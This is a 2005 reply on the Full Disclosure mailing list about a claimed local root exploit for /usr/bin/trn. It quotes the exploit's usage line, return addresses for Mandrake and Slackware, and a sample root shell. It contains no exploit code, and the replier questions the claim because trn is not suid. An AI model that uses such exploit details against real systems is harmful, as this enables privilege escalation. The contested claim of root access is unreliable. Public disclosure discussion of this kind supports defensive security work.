Full Disclosure mailing list archives
Re: /usr/bin/trn local root exploit
From: Frank Thyes <thyes () gmx net>
Date: Wed, 26 Jan 2005 13:41:11 +0100
+++ Z z a g o r R [Wed, Jan 26, 2005 at 09:27:28AM CET]:
/* /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com */ /* sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 [+] mandrake 9.2 = 0xbfffff96 [+] slackware 10.0.0= 0xbfffff98 [+] slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 [BOO %] 128 [RET %] bfffff84 sh-2.05b# sh-2.05b# id uid=0(root) gid=98(nobody) groups=98(nobody)
I didnt understand how you will get root? Afaik trn isnt suid. I didnt have Mandrake or another Linux here so i cant test it. Please explain. Regards Frank -- In the beginning was the word and the word was content-type: text/plain _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)
- Re: Re: /usr/bin/trn local root exploit Honza Vlach (Jan 26)
- Re: /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit Frank Thyes (Jan 26)
- <Possible follow-ups>
- Re: /usr/bin/trn local root exploit ntx0f (Jan 27)
- Re: /usr/bin/trn local root exploit Wojciech Pawlikowski (Jan 27)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)